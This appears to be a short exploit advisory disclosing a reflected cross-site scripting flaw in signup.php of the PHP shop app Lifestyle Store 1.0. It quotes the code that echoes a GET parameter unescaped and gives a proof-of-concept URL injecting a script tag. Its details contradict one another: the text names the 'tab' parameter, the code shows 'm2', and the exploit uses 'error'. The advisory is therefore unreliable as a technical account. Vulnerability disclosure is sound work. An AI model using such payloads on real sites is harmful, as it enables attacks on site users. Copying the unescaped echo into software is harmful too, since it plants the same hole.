Lifestyle Store 1.0 Cross Site Scripting

Lifestyle Store version 1.0 suffers from a cross site scripting vulnerability.


MD5 | d7c8253fafc2f8b1b505290bc4013a98

Lifestyle Store 1.0 Cross Site Scripting

# Exploit Title: Lifestyle Store (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2021-10-12
# Author: Thamer https://twitter.com/thamer9900
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip
# Version: 1.0.0
# Tested on: Windows 10


1. Description:
The tab parameter in the signup.php is vulnerable to XSS.


2. signup.php in line 62 code:

if(isset($_GET["m2"])){
echo $_GET['m2'];
}

3. Proof of Concept:
/online-shop/signup.php?error=<script>print()</script>

Related Posts